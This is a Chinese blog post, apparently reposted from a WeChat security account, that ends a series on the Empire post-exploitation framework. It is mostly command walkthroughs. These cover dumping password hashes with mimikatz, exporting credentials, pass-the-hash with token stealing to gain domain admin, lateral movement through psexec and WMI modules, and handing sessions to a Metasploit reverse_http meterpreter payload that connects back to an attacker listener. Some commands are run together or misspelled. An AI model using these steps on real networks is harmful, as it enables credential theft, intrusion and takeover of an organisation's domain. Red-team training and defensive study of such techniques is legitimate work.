【Empire系列完结】横向移动相关

admin 2021年9月4日10:55:43评论117 views字数 925阅读3分5秒阅读模式

#001 获取密码hash


1、内置mimikatz

mimikatz    #执行会有点缓慢,执行成功即可抓取hash

【Empire系列完结】横向移动相关



2、creds命令:

creds

【Empire系列完结】横向移动相关


creds<空格>+<双击tab键> 可以看到扩展命令

【Empire系列完结】横向移动相关


当内网很复杂,hash很多时,可以通过export导出为csv文件

crds export /root/hash    #会自动添加文件后缀

【Empire系列完结】横向移动相关


结果如下:

【Empire系列完结】横向移动相关



#002 横向移动模块

1、令牌窃取配合hash传递:

①执行mimikatz后

creds    #列出所有Empire获取到的密码

【Empire系列完结】横向移动相关


②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:

pth

【Empire系列完结】横向移动相关


然后就能看见PID号,窃取该PID进程的令牌即可

steal_token

【Empire系列完结】横向移动相关

即可成功获取域管权限



2、横向移动常用模块:

①invoke-psexec:

usemodule lateral_movement/invoke_psexecset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列完结】横向移动相关

成功会返回目标机器的agent会话



②invoke-wmi:

usemodule lateral_movement/invoke_wmiset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列完结】横向移动相关

成功会返回目标机器的agent会话



③其他模块根据实际情况选用即可

usemodule lateral_movement/    #tab键列出模块

【Empire系列完结】横向移动相关




#003  转为MSF会话

Invoke-MetasploitPayload<-->web_delivery(MSF):

①MSF执行

use exploit/multi/script/web_deliveryset target 2set payload windows/meterpreter/reverse_httpset lhostset lpotr <监听端口>exploit

【Empire系列完结】横向移动相关



②Empire执行:

usemodule code_execution/invoke_metasploitpayloadset URLexecute

【Empire系列完结】横向移动相关


执行成功后,MSF会上线一个新的meterpreter会话

【Empire系列完结】横向移动相关





☆ END ☆

点个赞和在看吧,欢迎转发!

【Empire系列完结】横向移动相关



本文始发于微信公众号(哈拉少安全小队):【Empire系列完结】横向移动相关

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日10:55:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Empire系列完结】横向移动相关http://cn-sec.com/archives/475845.html

发表评论

匿名网友 填写信息